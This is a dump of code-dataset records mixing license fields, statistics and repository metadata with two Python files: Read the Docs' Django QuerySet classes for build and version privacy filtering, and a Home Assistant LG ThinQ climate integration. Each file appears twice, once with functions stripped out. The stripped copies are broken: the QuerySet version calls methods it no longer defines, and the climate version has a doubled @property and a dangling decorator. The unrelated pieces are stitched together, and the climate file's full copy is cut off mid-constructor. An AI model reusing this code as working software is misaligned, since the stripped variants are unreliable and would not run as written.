[ "MIT" ]
null
null
null
"""Build and Version QuerySet classes.""" import datetime import logging from django.db import models from django.db.models import Q from django.utils import timezone from readthedocs.builds.constants import ( BUILD_STATE_FINISHED, BUILD_STATE_TRIGGERED, EXTERNAL, ) from readthedocs.core.permissions import AdminPermission from readthedocs.core.utils.extend import SettingsOverrideObject from readthedocs.projects import constants from readthedocs.projects.models import Project log = logging.getLogger(__name__) __all__ = ['VersionQuerySet', 'BuildQuerySet', 'RelatedBuildQuerySet'] class VersionQuerySetBase(models.QuerySet): """Versions take into account their own privacy_level setting.""" use_for_related_fields = True def __init__(self, *args, internal_only=False, external_only=False, **kwargs): """ Overridden to pass extra arguments from the manager. Usage: import functools ManagerClass.from_queryset( functools.partial(VersionQuerySet, internal_only=True) ) :param bool internal_only: If this queryset is being used to query internal versions only. :param bool external_only: If this queryset is being used to query external versions only. """ self.internal_only = internal_only self.external_only = external_only super().__init__(*args, **kwargs) def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def public( self, user=None, project=None, only_active=True, include_hidden=True, only_built=False, ): """ Get all allowed versions. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. """ queryset = self._public_only() if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects(queryset, user) if project: queryset = queryset.filter(project=project) if only_active: queryset = queryset.filter(active=True) if only_built: queryset = queryset.filter(built=True) if not include_hidden: queryset = queryset.filter(hidden=False) return queryset.distinct() class BuildQuerySet(models.QuerySet): """ Build objects that are privacy aware. i.e. they take into account the privacy of the Version that they relate to. """ use_for_related_fields = True def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def public(self, user=None, project=None): """ Get all allowed builds. Builds are public if the linked version and project are public. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. """ queryset = ( self.filter( version__privacy_level=constants.PUBLIC, version__project__privacy_level=constants.PUBLIC, ) .exclude(version__type=EXTERNAL) ) queryset |= self.filter( version__type=EXTERNAL, project__external_builds_privacy_level=constants.PUBLIC, project__privacy_level=constants.PUBLIC, ) if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects( queryset, user, admin=True, member=True, ) if project: queryset = queryset.filter(project=project) return queryset.distinct() def concurrent(self, project): """ Check if the max build concurrency for this project was reached. - regular project: counts concurrent builds - translation: concurrent builds of all the translations + builds of main project .. note:: If the project/translation belongs to an organization, we count all concurrent builds for all the projects from the organization. :rtype: tuple :returns: limit_reached, number of concurrent builds, number of max concurrent """ limit_reached = False query = Q( project__slug=project.slug, # Limit builds to 5 hours ago to speed up the query date__gte=timezone.now() - datetime.timedelta(hours=5), ) if project.main_language_project: # Project is a translation, counts all builds of all the translations query |= Q(project__main_language_project=project.main_language_project) query |= Q(project__slug=project.main_language_project.slug) elif project.translations.exists(): # The project has translations, counts their builds as well query |= Q(project__in=project.translations.all()) # If the project belongs to an organization, count all the projects # from this organization as well organization = project.organizations.first() if organization: query |= Q(project__in=organization.projects.all()) concurrent = ( self.filter(query) .exclude(state__in=[BUILD_STATE_TRIGGERED, BUILD_STATE_FINISHED]) ).distinct().count() max_concurrent = Project.objects.max_concurrent_builds(project) log.info( 'Concurrent builds. project=%s running=%s max=%s', project.slug, concurrent, max_concurrent, ) if concurrent >= max_concurrent: limit_reached = True return (limit_reached, concurrent, max_concurrent) class RelatedBuildQuerySet(models.QuerySet): """ For models with association to a project through :py:class:`Build`. .. note:: This is only used for ``BuildCommandViewSet`` from api v2. Which is being used to upload build command results from the builders. """ use_for_related_fields = True
32.638298
98
0.609518
"""Build and Version QuerySet classes.""" import datetime import logging from django.db import models from django.db.models import Q from django.utils import timezone from readthedocs.builds.constants import ( BUILD_STATE_FINISHED, BUILD_STATE_TRIGGERED, EXTERNAL, ) from readthedocs.core.permissions import AdminPermission from readthedocs.core.utils.extend import SettingsOverrideObject from readthedocs.projects import constants from readthedocs.projects.models import Project log = logging.getLogger(__name__) __all__ = ['VersionQuerySet', 'BuildQuerySet', 'RelatedBuildQuerySet'] class VersionQuerySetBase(models.QuerySet): """Versions take into account their own privacy_level setting.""" use_for_related_fields = True def __init__(self, *args, internal_only=False, external_only=False, **kwargs): """ Overridden to pass extra arguments from the manager. Usage: import functools ManagerClass.from_queryset( functools.partial(VersionQuerySet, internal_only=True) ) :param bool internal_only: If this queryset is being used to query internal versions only. :param bool external_only: If this queryset is being used to query external versions only. """ self.internal_only = internal_only self.external_only = external_only super().__init__(*args, **kwargs) def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def _public_only(self): if self.internal_only: # Since internal versions are already filtered, # don't do anything special. queryset = self.filter(privacy_level=constants.PUBLIC) elif self.external_only: # Since external versions are already filtered, # don't filter them again. queryset = self.filter( project__external_builds_privacy_level=constants.PUBLIC, ) else: queryset = self.filter(privacy_level=constants.PUBLIC).exclude(type=EXTERNAL) queryset |= self.filter( type=EXTERNAL, project__external_builds_privacy_level=constants.PUBLIC, ) return queryset def public( self, user=None, project=None, only_active=True, include_hidden=True, only_built=False, ): """ Get all allowed versions. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. """ queryset = self._public_only() if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects(queryset, user) if project: queryset = queryset.filter(project=project) if only_active: queryset = queryset.filter(active=True) if only_built: queryset = queryset.filter(built=True) if not include_hidden: queryset = queryset.filter(hidden=False) return queryset.distinct() def api(self, user=None): return self.public(user, only_active=False) class VersionQuerySet(SettingsOverrideObject): _default_class = VersionQuerySetBase class BuildQuerySet(models.QuerySet): """ Build objects that are privacy aware. i.e. they take into account the privacy of the Version that they relate to. """ use_for_related_fields = True def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def public(self, user=None, project=None): """ Get all allowed builds. Builds are public if the linked version and project are public. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. """ queryset = ( self.filter( version__privacy_level=constants.PUBLIC, version__project__privacy_level=constants.PUBLIC, ) .exclude(version__type=EXTERNAL) ) queryset |= self.filter( version__type=EXTERNAL, project__external_builds_privacy_level=constants.PUBLIC, project__privacy_level=constants.PUBLIC, ) if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects( queryset, user, admin=True, member=True, ) if project: queryset = queryset.filter(project=project) return queryset.distinct() def api(self, user=None): return self.public(user) def concurrent(self, project): """ Check if the max build concurrency for this project was reached. - regular project: counts concurrent builds - translation: concurrent builds of all the translations + builds of main project .. note:: If the project/translation belongs to an organization, we count all concurrent builds for all the projects from the organization. :rtype: tuple :returns: limit_reached, number of concurrent builds, number of max concurrent """ limit_reached = False query = Q( project__slug=project.slug, # Limit builds to 5 hours ago to speed up the query date__gte=timezone.now() - datetime.timedelta(hours=5), ) if project.main_language_project: # Project is a translation, counts all builds of all the translations query |= Q(project__main_language_project=project.main_language_project) query |= Q(project__slug=project.main_language_project.slug) elif project.translations.exists(): # The project has translations, counts their builds as well query |= Q(project__in=project.translations.all()) # If the project belongs to an organization, count all the projects # from this organization as well organization = project.organizations.first() if organization: query |= Q(project__in=organization.projects.all()) concurrent = ( self.filter(query) .exclude(state__in=[BUILD_STATE_TRIGGERED, BUILD_STATE_FINISHED]) ).distinct().count() max_concurrent = Project.objects.max_concurrent_builds(project) log.info( 'Concurrent builds. project=%s running=%s max=%s', project.slug, concurrent, max_concurrent, ) if concurrent >= max_concurrent: limit_reached = True return (limit_reached, concurrent, max_concurrent) class RelatedBuildQuerySet(models.QuerySet): """ For models with association to a project through :py:class:`Build`. .. note:: This is only used for ``BuildCommandViewSet`` from api v2. Which is being used to upload build command results from the builders. """ use_for_related_fields = True def _add_from_user_projects(self, queryset, user): if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=True, member=True, ) .values_list('pk', flat=True) ) user_queryset = self.filter(build__project__in=projects_pk) queryset = user_queryset | queryset return queryset def public(self, user=None): queryset = self.filter(build__version__privacy_level=constants.PUBLIC) if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects(queryset, user) return queryset.distinct() def api(self, user=None): return self.public(user)
1,629
66
185
70697284aed98a0a1ec55f4830a7d80f5a7ab937
14,978
py
Python
homeassistant/config/custom_components/smartthinq_sensors/climate.py
yuvalabou/homeassistant
e25885db33d2144455928d07d7e9b044278ba291
[ "Unlicense" ]
14
2020-03-25T17:14:17.000Z
2020-04-19T02:03:48.000Z
homeassistant/config/custom_components/smartthinq_sensors/climate.py
yuvalabou/homeassistant
e25885db33d2144455928d07d7e9b044278ba291
[ "Unlicense" ]
16
2020-03-26T03:32:03.000Z
2020-04-18T21:28:54.000Z
homeassistant/config/custom_components/smartthinq_sensors/climate.py
yuvalabou/homeassistant
e25885db33d2144455928d07d7e9b044278ba291
[ "Unlicense" ]
6
2020-03-28T19:41:18.000Z
2020-04-13T14:04:18.000Z
"""Platform for LGE climate integration.""" from __future__ import annotations from dataclasses import dataclass from datetime import timedelta import logging from typing import Any, Awaitable, Callable, List, Tuple from .wideq import ( FEAT_HUMIDITY, FEAT_OUT_WATER_TEMP, UNIT_TEMP_FAHRENHEIT, DeviceType, ) from .wideq.ac import AirConditionerDevice, ACMode from homeassistant.components.climate import ClimateEntity, ClimateEntityDescription from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, DEFAULT_MAX_TEMP, DEFAULT_MIN_TEMP, ClimateEntityFeature, HVACMode, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ATTR_TEMPERATURE, TEMP_CELSIUS, TEMP_FAHRENHEIT from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity from . import LGEDevice from .const import DOMAIN, LGE_DEVICES from .device_helpers import ( TEMP_UNIT_LOOKUP, LGERefrigeratorDevice, get_entity_name, ) # general ac attributes ATTR_FRIDGE = "fridge" ATTR_FREEZER = "freezer" HVAC_MODE_LOOKUP: dict[str, HVACMode] = { ACMode.ENERGY_SAVER.name: HVACMode.AUTO, ACMode.AI.name: HVACMode.AUTO, ACMode.HEAT.name: HVACMode.HEAT, ACMode.DRY.name: HVACMode.DRY, ACMode.COOL.name: HVACMode.COOL, ACMode.FAN.name: HVACMode.FAN_ONLY, ACMode.ACO.name: HVACMode.HEAT_COOL, } ATTR_SWING_HORIZONTAL = "swing_mode_horizontal" ATTR_SWING_VERTICAL = "swing_mode_vertical" SWING_PREFIX = ["Vertical", "Horizontal"] SCAN_INTERVAL = timedelta(seconds=120) _LOGGER = logging.getLogger(__name__) @dataclass class ThinQRefClimateRequiredKeysMixin: """Mixin for required keys.""" range_temp_fn: Callable[[Any], List[float]] set_temp_fn: Callable[[Any, float], Awaitable[None]] temp_fn: Callable[[Any], float | str] @dataclass class ThinQRefClimateEntityDescription( ClimateEntityDescription, ThinQRefClimateRequiredKeysMixin ): """A class that describes ThinQ climate entities.""" REFRIGERATOR_CLIMATE: Tuple[ThinQRefClimateEntityDescription, ...] = ( ThinQRefClimateEntityDescription( key=ATTR_FRIDGE, name="Fridge", icon="mdi:fridge-top", range_temp_fn=lambda x: x.device.fridge_target_temp_range, set_temp_fn=lambda x, y: x.device.set_fridge_target_temp(y), temp_fn=lambda x: x.temp_fridge, ), ThinQRefClimateEntityDescription( key=ATTR_FREEZER, name="Freezer", icon="mdi:fridge-bottom", range_temp_fn=lambda x: x.device.freezer_target_temp_range, set_temp_fn=lambda x, y: x.device.set_freezer_target_temp(y), temp_fn=lambda x: x.temp_freezer, ), ) def remove_prefix(text: str, prefix: str) -> str: """Remove a prefix from a string.""" if text.startswith(prefix): return text[len(prefix):] return text async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up LGE device climate based on config_entry.""" entry_config = hass.data[DOMAIN] lge_devices = entry_config.get(LGE_DEVICES) if not lge_devices: return _LOGGER.debug("Starting LGE ThinQ climate setup...") lge_climates = [] # AC devices lge_climates.extend( [ LGEACClimate(lge_device) for lge_device in lge_devices.get(DeviceType.AC, []) ] ) # Refrigerator devices lge_climates.extend( [ LGERefrigeratorClimate(lge_device, refrigerator_desc) for refrigerator_desc in REFRIGERATOR_CLIMATE for lge_device in lge_devices.get(DeviceType.REFRIGERATOR, []) ] ) async_add_entities(lge_climates) class LGEClimate(CoordinatorEntity, ClimateEntity): """Base climate device.""" def __init__(self, api: LGEDevice): """Initialize the climate.""" super().__init__(api.coordinator) self._api = api self._attr_device_info = api.device_info @property def should_poll(self) -> bool: """Return True if entity has to be polled for state. We overwrite coordinator property default setting because we need to poll to avoid the effect that after changing a climate settings it is immediately set to prev state. The async_update method here do nothing because the real update is performed by coordinator. """ return True async def async_update(self) -> None: """Update the entity. This is a fake update, real update is done by coordinator. """ return @property def available(self) -> bool: """Return True if entity is available.""" return self._api.available class LGEACClimate(LGEClimate): """Air-to-Air climate device.""" def __init__(self, api: LGEDevice) -> None: """Initialize the climate.""" super().__init__(api) self._device: AirConditionerDevice = api.device self._attr_name = api.name self._attr_unique_id = f"{api.unique_id}-AC" self._attr_fan_modes = self._device.fan_speeds self._attr_swing_modes = [ f"{SWING_PREFIX[0]}{mode}" for mode in self._device.vertical_step_modes ] + [ f"{SWING_PREFIX[1]}{mode}" for mode in self._device.horizontal_step_modes ] self._hvac_mode_lookup: dict[str, HVACMode] | None = None self._support_ver_swing = len(self._device.vertical_step_modes) > 0 self._support_hor_swing = len(self._device.horizontal_step_modes) > 0 self._set_hor_swing = self._support_hor_swing and not self._support_ver_swing def _available_hvac_modes(self) -> dict[str, HVACMode]: """Return available hvac modes from lookup dict.""" if self._hvac_mode_lookup is None: modes = {} for key, mode in HVAC_MODE_LOOKUP.items(): if key in self._device.op_modes: # invert key and mode to avoid duplicated HVAC modes modes[mode] = key self._hvac_mode_lookup = {v: k for k, v in modes.items()} return self._hvac_mode_lookup def _get_swing_mode(self, hor_mode=False) -> str | None: """Return the current swing mode for vert of hor mode.""" if hor_mode: mode = self._api.state.horizontal_step_mode else: mode = self._api.state.vertical_step_mode if mode: return f"{SWING_PREFIX[1 if hor_mode else 0]}{mode}" return None @property def supported_features(self) -> int: """Return the list of supported features.""" features = ClimateEntityFeature.TARGET_TEMPERATURE if len(self.fan_modes) > 0: features |= ClimateEntityFeature.FAN_MODE if self._support_ver_swing or self._support_hor_swing: features |= ClimateEntityFeature.SWING_MODE return features @property def extra_state_attributes(self): """Return the optional state attributes with device specific additions.""" attr = {} if self._support_hor_swing: attr[ATTR_SWING_HORIZONTAL] = self._get_swing_mode(True) if self._support_ver_swing: attr[ATTR_SWING_VERTICAL] = self._get_swing_mode(False) return attr @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._device.temperature_unit == UNIT_TEMP_FAHRENHEIT: return TEMP_FAHRENHEIT return TEMP_CELSIUS @property def hvac_mode(self) -> HVACMode: """Return hvac operation ie. heat, cool mode.""" op_mode: str | None = self._api.state.operation_mode if not self._api.state.is_on or op_mode is None: return HVACMode.OFF modes = self._available_hvac_modes() return modes.get(op_mode, HVACMode.AUTO) async def async_set_hvac_mode(self, hvac_mode: HVACMode) -> None: """Set new target hvac mode.""" if hvac_mode == HVACMode.OFF: await self._device.power(False) return modes = self._available_hvac_modes() reverse_lookup = {v: k for k, v in modes.items()} operation_mode = reverse_lookup.get(hvac_mode) if operation_mode is None: raise ValueError(f"Invalid hvac_mode [{hvac_mode}]") if self.hvac_mode == HVACMode.OFF: await self._device.power(True) await self._device.set_op_mode(operation_mode) @property def hvac_modes(self) -> list[HVACMode]: """Return the list of available hvac operation modes.""" modes = self._available_hvac_modes() return [HVACMode.OFF] + list(modes.values()) @property def current_temperature(self) -> float: """Return the current temperature.""" curr_temp = None if self._device.is_air_to_water: curr_temp = self._api.state.device_features.get(FEAT_OUT_WATER_TEMP) if curr_temp is None: curr_temp = self._api.state.current_temp return curr_temp @property @property def target_temperature(self) -> float: """Return the temperature we try to reach.""" return self._api.state.target_temp async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if hvac_mode := kwargs.get(ATTR_HVAC_MODE): await self.async_set_hvac_mode(HVACMode(hvac_mode)) if new_temp := kwargs.get(ATTR_TEMPERATURE): await self._device.set_target_temp(new_temp) @property def fan_mode(self) -> str | None: """Return the fan setting.""" return self._api.state.fan_speed async def async_set_fan_mode(self, fan_mode: str) -> None: """Set new target fan mode.""" if fan_mode not in self.fan_modes: raise ValueError(f"Invalid fan mode [{fan_mode}]") await self._device.set_fan_speed(fan_mode) @property def swing_mode(self) -> str | None: """Return the swing mode setting.""" if self._set_hor_swing and self._support_hor_swing: return self._get_swing_mode(True) return self._get_swing_mode(False) async def async_set_swing_mode(self, swing_mode: str) -> None: """Set new target swing mode.""" avl_mode = False curr_mode = None set_hor_swing = swing_mode.startswith(SWING_PREFIX[1]) dev_mode = remove_prefix( swing_mode, SWING_PREFIX[1 if set_hor_swing else 0] ) if set_hor_swing: if dev_mode in self._device.horizontal_step_modes: avl_mode = True curr_mode = self._api.state.horizontal_step_mode elif swing_mode.startswith(SWING_PREFIX[0]): if dev_mode in self._device.vertical_step_modes: avl_mode = True curr_mode = self._api.state.vertical_step_mode if not avl_mode: raise ValueError(f"Invalid swing_mode [{swing_mode}].") if curr_mode != dev_mode: if set_hor_swing: await self._device.set_horizontal_step_mode(dev_mode) else: await self._device.set_vertical_step_mode(dev_mode) self._set_hor_swing = set_hor_swing async def async_turn_on(self) -> None: """Turn the entity on.""" await self._device.power(True) async def async_turn_off(self) -> None: """Turn the entity off.""" await self._device.power(False) @property def min_temp(self) -> float: """Return the minimum temperature.""" if (min_value := self._device.target_temperature_min) is not None: return min_value return self._device.conv_temp_unit(DEFAULT_MIN_TEMP) @property def max_temp(self) -> float: """Return the maximum temperature.""" if (max_value := self._device.target_temperature_max) is not None: return max_value return self._device.conv_temp_unit(DEFAULT_MAX_TEMP) class LGERefrigeratorClimate(LGEClimate): """Refrigerator climate device.""" entity_description = ThinQRefClimateEntityDescription def __init__( self, api: LGEDevice, description: ThinQRefClimateEntityDescription, ) -> None: """Initialize the climate.""" super().__init__(api) self._wrap_device = LGERefrigeratorDevice(api) self.entity_description = description self._attr_name = get_entity_name(api, description.key, description.name) self._attr_unique_id = f"{api.unique_id}-{description.key}-AC" self._attr_hvac_modes = [HVACMode.AUTO] self._attr_hvac_mode = HVACMode.AUTO @property def supported_features(self) -> int: """Return the list of supported features.""" if not self._wrap_device.device.set_values_allowed: return 0 return ClimateEntityFeature.TARGET_TEMPERATURE @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._wrap_device.device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._api.state: unit = self._api.state.temp_unit return TEMP_UNIT_LOOKUP.get(unit, TEMP_CELSIUS) return TEMP_CELSIUS @property def current_temperature(self) -> float | None: """Return the current temperature.""" curr_temp = self.entity_description.temp_fn(self._wrap_device) if curr_temp is None: return None try: return int(curr_temp) except ValueError: return None @property def target_temperature(self) -> float | None: """Return the temperature we try to reach.""" return self.current_temperature async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if new_temp := kwargs.get(ATTR_TEMPERATURE): await self.entity_description.set_temp_fn(self._wrap_device, new_temp) @property def min_temp(self) -> float: """Return the minimum temperature.""" return self.entity_description.range_temp_fn(self._wrap_device)[0] @property
34.196347
85
0.664975
"""Platform for LGE climate integration.""" from __future__ import annotations from dataclasses import dataclass from datetime import timedelta import logging from typing import Any, Awaitable, Callable, List, Tuple from .wideq import ( FEAT_HUMIDITY, FEAT_OUT_WATER_TEMP, UNIT_TEMP_FAHRENHEIT, DeviceType, ) from .wideq.ac import AirConditionerDevice, ACMode from homeassistant.components.climate import ClimateEntity, ClimateEntityDescription from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, DEFAULT_MAX_TEMP, DEFAULT_MIN_TEMP, ClimateEntityFeature, HVACMode, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ATTR_TEMPERATURE, TEMP_CELSIUS, TEMP_FAHRENHEIT from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity from . import LGEDevice from .const import DOMAIN, LGE_DEVICES from .device_helpers import ( TEMP_UNIT_LOOKUP, LGERefrigeratorDevice, get_entity_name, ) # general ac attributes ATTR_FRIDGE = "fridge" ATTR_FREEZER = "freezer" HVAC_MODE_LOOKUP: dict[str, HVACMode] = { ACMode.ENERGY_SAVER.name: HVACMode.AUTO, ACMode.AI.name: HVACMode.AUTO, ACMode.HEAT.name: HVACMode.HEAT, ACMode.DRY.name: HVACMode.DRY, ACMode.COOL.name: HVACMode.COOL, ACMode.FAN.name: HVACMode.FAN_ONLY, ACMode.ACO.name: HVACMode.HEAT_COOL, } ATTR_SWING_HORIZONTAL = "swing_mode_horizontal" ATTR_SWING_VERTICAL = "swing_mode_vertical" SWING_PREFIX = ["Vertical", "Horizontal"] SCAN_INTERVAL = timedelta(seconds=120) _LOGGER = logging.getLogger(__name__) @dataclass class ThinQRefClimateRequiredKeysMixin: """Mixin for required keys.""" range_temp_fn: Callable[[Any], List[float]] set_temp_fn: Callable[[Any, float], Awaitable[None]] temp_fn: Callable[[Any], float | str] @dataclass class ThinQRefClimateEntityDescription( ClimateEntityDescription, ThinQRefClimateRequiredKeysMixin ): """A class that describes ThinQ climate entities.""" REFRIGERATOR_CLIMATE: Tuple[ThinQRefClimateEntityDescription, ...] = ( ThinQRefClimateEntityDescription( key=ATTR_FRIDGE, name="Fridge", icon="mdi:fridge-top", range_temp_fn=lambda x: x.device.fridge_target_temp_range, set_temp_fn=lambda x, y: x.device.set_fridge_target_temp(y), temp_fn=lambda x: x.temp_fridge, ), ThinQRefClimateEntityDescription( key=ATTR_FREEZER, name="Freezer", icon="mdi:fridge-bottom", range_temp_fn=lambda x: x.device.freezer_target_temp_range, set_temp_fn=lambda x, y: x.device.set_freezer_target_temp(y), temp_fn=lambda x: x.temp_freezer, ), ) def remove_prefix(text: str, prefix: str) -> str: """Remove a prefix from a string.""" if text.startswith(prefix): return text[len(prefix):] return text async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up LGE device climate based on config_entry.""" entry_config = hass.data[DOMAIN] lge_devices = entry_config.get(LGE_DEVICES) if not lge_devices: return _LOGGER.debug("Starting LGE ThinQ climate setup...") lge_climates = [] # AC devices lge_climates.extend( [ LGEACClimate(lge_device) for lge_device in lge_devices.get(DeviceType.AC, []) ] ) # Refrigerator devices lge_climates.extend( [ LGERefrigeratorClimate(lge_device, refrigerator_desc) for refrigerator_desc in REFRIGERATOR_CLIMATE for lge_device in lge_devices.get(DeviceType.REFRIGERATOR, []) ] ) async_add_entities(lge_climates) class LGEClimate(CoordinatorEntity, ClimateEntity): """Base climate device.""" def __init__(self, api: LGEDevice): """Initialize the climate.""" super().__init__(api.coordinator) self._api = api self._attr_device_info = api.device_info @property def should_poll(self) -> bool: """Return True if entity has to be polled for state. We overwrite coordinator property default setting because we need to poll to avoid the effect that after changing a climate settings it is immediately set to prev state. The async_update method here do nothing because the real update is performed by coordinator. """ return True async def async_update(self) -> None: """Update the entity. This is a fake update, real update is done by coordinator. """ return @property def available(self) -> bool: """Return True if entity is available.""" return self._api.available class LGEACClimate(LGEClimate): """Air-to-Air climate device.""" def __init__(self, api: LGEDevice) -> None: """Initialize the climate.""" super().__init__(api) self._device: AirConditionerDevice = api.device self._attr_name = api.name self._attr_unique_id = f"{api.unique_id}-AC" self._attr_fan_modes = self._device.fan_speeds self._attr_swing_modes = [ f"{SWING_PREFIX[0]}{mode}" for mode in self._device.vertical_step_modes ] + [ f"{SWING_PREFIX[1]}{mode}" for mode in self._device.horizontal_step_modes ] self._hvac_mode_lookup: dict[str, HVACMode] | None = None self._support_ver_swing = len(self._device.vertical_step_modes) > 0 self._support_hor_swing = len(self._device.horizontal_step_modes) > 0 self._set_hor_swing = self._support_hor_swing and not self._support_ver_swing def _available_hvac_modes(self) -> dict[str, HVACMode]: """Return available hvac modes from lookup dict.""" if self._hvac_mode_lookup is None: modes = {} for key, mode in HVAC_MODE_LOOKUP.items(): if key in self._device.op_modes: # invert key and mode to avoid duplicated HVAC modes modes[mode] = key self._hvac_mode_lookup = {v: k for k, v in modes.items()} return self._hvac_mode_lookup def _get_swing_mode(self, hor_mode=False) -> str | None: """Return the current swing mode for vert of hor mode.""" if hor_mode: mode = self._api.state.horizontal_step_mode else: mode = self._api.state.vertical_step_mode if mode: return f"{SWING_PREFIX[1 if hor_mode else 0]}{mode}" return None @property def supported_features(self) -> int: """Return the list of supported features.""" features = ClimateEntityFeature.TARGET_TEMPERATURE if len(self.fan_modes) > 0: features |= ClimateEntityFeature.FAN_MODE if self._support_ver_swing or self._support_hor_swing: features |= ClimateEntityFeature.SWING_MODE return features @property def extra_state_attributes(self): """Return the optional state attributes with device specific additions.""" attr = {} if self._support_hor_swing: attr[ATTR_SWING_HORIZONTAL] = self._get_swing_mode(True) if self._support_ver_swing: attr[ATTR_SWING_VERTICAL] = self._get_swing_mode(False) return attr @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._device.temperature_unit == UNIT_TEMP_FAHRENHEIT: return TEMP_FAHRENHEIT return TEMP_CELSIUS @property def hvac_mode(self) -> HVACMode: """Return hvac operation ie. heat, cool mode.""" op_mode: str | None = self._api.state.operation_mode if not self._api.state.is_on or op_mode is None: return HVACMode.OFF modes = self._available_hvac_modes() return modes.get(op_mode, HVACMode.AUTO) async def async_set_hvac_mode(self, hvac_mode: HVACMode) -> None: """Set new target hvac mode.""" if hvac_mode == HVACMode.OFF: await self._device.power(False) return modes = self._available_hvac_modes() reverse_lookup = {v: k for k, v in modes.items()} operation_mode = reverse_lookup.get(hvac_mode) if operation_mode is None: raise ValueError(f"Invalid hvac_mode [{hvac_mode}]") if self.hvac_mode == HVACMode.OFF: await self._device.power(True) await self._device.set_op_mode(operation_mode) @property def hvac_modes(self) -> list[HVACMode]: """Return the list of available hvac operation modes.""" modes = self._available_hvac_modes() return [HVACMode.OFF] + list(modes.values()) @property def current_temperature(self) -> float: """Return the current temperature.""" curr_temp = None if self._device.is_air_to_water: curr_temp = self._api.state.device_features.get(FEAT_OUT_WATER_TEMP) if curr_temp is None: curr_temp = self._api.state.current_temp return curr_temp @property def current_humidity(self) -> int | None: return self._api.state.device_features.get(FEAT_HUMIDITY) @property def target_temperature(self) -> float: """Return the temperature we try to reach.""" return self._api.state.target_temp async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if hvac_mode := kwargs.get(ATTR_HVAC_MODE): await self.async_set_hvac_mode(HVACMode(hvac_mode)) if new_temp := kwargs.get(ATTR_TEMPERATURE): await self._device.set_target_temp(new_temp) @property def fan_mode(self) -> str | None: """Return the fan setting.""" return self._api.state.fan_speed async def async_set_fan_mode(self, fan_mode: str) -> None: """Set new target fan mode.""" if fan_mode not in self.fan_modes: raise ValueError(f"Invalid fan mode [{fan_mode}]") await self._device.set_fan_speed(fan_mode) @property def swing_mode(self) -> str | None: """Return the swing mode setting.""" if self._set_hor_swing and self._support_hor_swing: return self._get_swing_mode(True) return self._get_swing_mode(False) async def async_set_swing_mode(self, swing_mode: str) -> None: """Set new target swing mode.""" avl_mode = False curr_mode = None set_hor_swing = swing_mode.startswith(SWING_PREFIX[1]) dev_mode = remove_prefix( swing_mode, SWING_PREFIX[1 if set_hor_swing else 0] ) if set_hor_swing: if dev_mode in self._device.horizontal_step_modes: avl_mode = True curr_mode = self._api.state.horizontal_step_mode elif swing_mode.startswith(SWING_PREFIX[0]): if dev_mode in self._device.vertical_step_modes: avl_mode = True curr_mode = self._api.state.vertical_step_mode if not avl_mode: raise ValueError(f"Invalid swing_mode [{swing_mode}].") if curr_mode != dev_mode: if set_hor_swing: await self._device.set_horizontal_step_mode(dev_mode) else: await self._device.set_vertical_step_mode(dev_mode) self._set_hor_swing = set_hor_swing async def async_turn_on(self) -> None: """Turn the entity on.""" await self._device.power(True) async def async_turn_off(self) -> None: """Turn the entity off.""" await self._device.power(False) @property def min_temp(self) -> float: """Return the minimum temperature.""" if (min_value := self._device.target_temperature_min) is not None: return min_value return self._device.conv_temp_unit(DEFAULT_MIN_TEMP) @property def max_temp(self) -> float: """Return the maximum temperature.""" if (max_value := self._device.target_temperature_max) is not None: return max_value return self._device.conv_temp_unit(DEFAULT_MAX_TEMP) class LGERefrigeratorClimate(LGEClimate): """Refrigerator climate device.""" entity_description = ThinQRefClimateEntityDescription def __init__( self, 